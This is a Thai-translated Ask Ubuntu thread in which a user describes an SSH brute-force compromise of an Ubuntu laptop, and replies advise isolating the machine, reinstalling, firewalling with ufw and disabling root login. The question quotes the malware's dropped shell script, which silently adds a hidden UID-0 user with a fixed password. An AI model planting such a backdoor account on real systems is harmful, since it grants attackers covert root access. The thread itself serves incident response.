จะจัดการกับมัลแวร์บนแล็ปท็อปของฉันได้อย่างไร


12

ฉันค่อนข้างแน่ใจว่าแล็ปท็อป Ubuntu 13.10 ของฉันติดมัลแวร์บางประเภท

ทุกครั้งที่ฉันพบกระบวนการ / lib / sshd (เป็นเจ้าของโดย root) ทำงานและใช้ cpu มากมาย ไม่ใช่เซิร์ฟเวอร์ sshd ที่รัน / usr / sbin / sshd

ไบนารีมีสิทธิ์ --wxrw-rwt และสร้างและวางไข่สคริปต์ในไดเรกทอรี / lib ชื่อล่าสุดคือ 13959730401387633604 และทำสิ่งต่อไปนี้

#!/bin/sh
exec 1>/dev/null
exec 2>/dev/null
useradd -g 0 -u 0 -o gusr
echo gusr:chaonimabi123456123 | chpasswd

ผู้ใช้ gusr ถูกสร้างขึ้นโดยมัลแวร์อย่างอิสระจากนั้น chpasswd จะหยุดทำงานในขณะที่ใช้ CPU 100%

จนถึงตอนนี้ฉันได้ระบุว่าผู้ใช้ gusr ถูกเพิ่มเข้าไปในไฟล์ใน / etc /

/etc/group
/etc/gshadow
/etc/passwd
/etc/shadow
/etc/subgid
/etc/subuid

ดูเหมือนว่ามัลแวร์ทำสำเนาของไฟล์เหล่านี้ทั้งหมดด้วยส่วนต่อท้าย "-" รายการเต็มรูปแบบของไฟล์ / etc / ไฟล์ที่ได้รับการแก้ไขโดยรากสามารถใช้ได้ที่นี่

นอกจากนี้ไฟล์ / etc / hosts ก็เปลี่ยนไปนี้

กระบวนการ / lib / sshd เริ่มต้นด้วยการเพิ่มตัวเองลงในตอนท้ายของไฟล์ /etc/init.d/rc.local!

ฉันได้ลบผู้ใช้ลบไฟล์ฆ่าโครงสร้างของประมวลผลเปลี่ยนรหัสผ่านของฉันและลบคีย์สาธารณะ ssh

ฉันรู้ว่าฉันถูกเมาโดยทั่วไปและฉันจะติดตั้งทั้งระบบใหม่ อย่างไรก็ตามตั้งแต่ฉันเข้าสู่ระบบไปยังเครื่องอื่น ๆ หลาย ๆ เครื่องมันจะเป็นการดีถ้าอย่างน้อยฉันก็พยายามที่จะลบมันออก ข้อเสนอแนะใด ๆ เกี่ยวกับวิธีการเกี่ยวกับเรื่องนี้จะได้รับการชื่นชม

ดูเหมือนว่าพวกเขาจะเข้ามาในวันที่ 25 มีนาคมโดยการเข้าสู่ระบบรูทบังคับ ฉันไม่ทราบว่ารูท ssh เปิดใช้งานโดยค่าเริ่มต้นใน Ubuntu ฉันปิดการใช้งานและวาง denyhosts

การเข้าสู่ระบบมาจาก 59.188.247.236 มีบางแห่งในฮ่องกงที่เห็นได้ชัด

ฉันได้แล็ปท็อปจาก EmperorLinux และพวกเขาเปิดใช้งานการเข้าถึงรูต หากคุณมีหนึ่งในนั้นและคุณใช้ sshd ระวัง


2
นำเครื่องของคุณออกจากเครือข่าย! ในขณะนี้!
เซท

2
และทำไมคุณถึงเปิดใช้งานการเข้าสู่ระบบรูท? นั่นคือสิ่งที่คุณไม่ควรเปิดใช้งานโดยไม่มีเหตุผลที่ดี
เซท

@Seth ฉันไม่ได้เปิดใช้งานมันเป็นค่าเริ่มต้นใน Ubuntu ฉันประหลาดใจอย่างที่คุณเป็น
Dejan Jovanović

1
ดูที่ " โดยค่าเริ่มต้น SSH daemon มาพร้อมกับการเปิดใช้งานการเข้าสู่ระบบจากระยะไกลโดยทั่วไป Ubuntu ไม่อนุญาตให้เข้าถึงผู้ใช้รูทโดยตรงดังนั้นการตั้งค่านี้ไม่สำคัญหากคุณได้ตั้งรหัสผ่านในบัญชีรูท ความเสี่ยงด้านความปลอดภัยและควรปิดใช้งาน "
เซท

1
Linux/Eburyผมค่อนข้างมั่นใจว่านี้ไม่ได้ เป็นอย่างอื่นและอาจไม่มีชื่อที่กำหนด Ebury จะไม่สร้างบัญชีผู้ใช้ใหม่และจะแก้ไขไลบรารีที่แบ่งใช้ที่ใช้โดย openssh โดยไม่ลดลงในไบนารีใหม่ที่ชื่อว่า sshd
Riking

คำตอบ:


11

ก่อนอื่นนำเครื่องนั้นออกจากเครือข่ายทันที!

ประการที่สองทำไมคุณเปิดใช้งานบัญชีรูท คุณไม่ควรเปิดใช้งานบัญชีรูทเว้นแต่คุณจะมีเหตุผลที่ดีในการทำเช่นนั้น

ประการที่สามใช่วิธีเดียวที่จะทำให้แน่ใจว่าคุณกำลังทำความสะอาดคือทำการติดตั้งใหม่ทั้งหมด เราขอแนะนำให้คุณเริ่มต้นใหม่และอย่ากลับไปสำรองข้อมูลเนื่องจากคุณจะไม่สามารถมั่นใจได้ว่าเมื่อใดที่ข้อมูลเริ่มขึ้น

ฉันขอแนะนำให้คุณตั้งค่าไฟร์วอลล์ aa ในการติดตั้งครั้งถัดไปและปฏิเสธการเชื่อมต่อขาเข้าทั้งหมด:

sudo ufw default deny incoming

และอนุญาตให้ ssh ด้วย:

sudo ufw allow ssh

และไม่เปิดใช้งานบัญชีรูท! แน่นอนให้แน่ใจว่าการเข้าสู่ระบบราก SSH เป็นคนพิการ


4
ฉันตรวจสอบบัญชีรูท ฉันได้แล็ปท็อปจาก Emperorlinux และพวกเขาเปิดใช้งานบัญชีเพื่อตั้งค่า โง่.
Dejan Jovanović

1
@ DejanJovanovićนั่นแย่มาก!
เซท
โดยการใช้ไซต์ของเรา หมายความว่าคุณได้อ่านและทำความเข้าใจนโยบายคุกกี้และนโยบายความเป็นส่วนตัวของเราแล้ว
Licensed under cc by-sa 3.0 with attribution required.